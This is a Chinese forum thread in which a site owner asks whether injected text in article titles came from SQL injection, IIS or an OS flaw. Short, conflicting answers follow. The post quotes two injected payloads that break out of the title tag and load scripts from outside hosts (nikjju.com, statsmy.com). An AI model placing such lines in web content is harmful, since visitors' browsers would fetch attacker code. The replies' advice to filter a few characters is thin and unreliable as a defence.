这种情况,是操作系统漏洞,还是 IIS 或 SQL 注入?
网站:
windows 2003 + ASP + Sql2000
所有文章的标题,被加上了 后缀,比如:
今年情人节出怪招 不走浪漫走传统 ,变成:
今年情人节出怪招 不走浪漫走传统 </title><script src=http://nikjju.com/r.php ></script>
野外露头保护措施,变成
野外露头保护措施 </title><script src=http://statsmy.com/ur.php ></script>
这种情况,是 SQL注入的还是 IIS 或 操作系统漏洞 造成的?
[解决办法]
SQL漏洞。。
检查程序传入SQL参数,
过滤“'",";"等非法字符
[解决办法]
如果网站有上传功能的话,也有可能是上传的程序(在线编辑器)有漏洞,上传了木马程序.
[解决办法]
这是 操作系统漏洞造成的
有人进入了你的服务器,并在生成 HTML 的程序或模板中插入了脚本代码
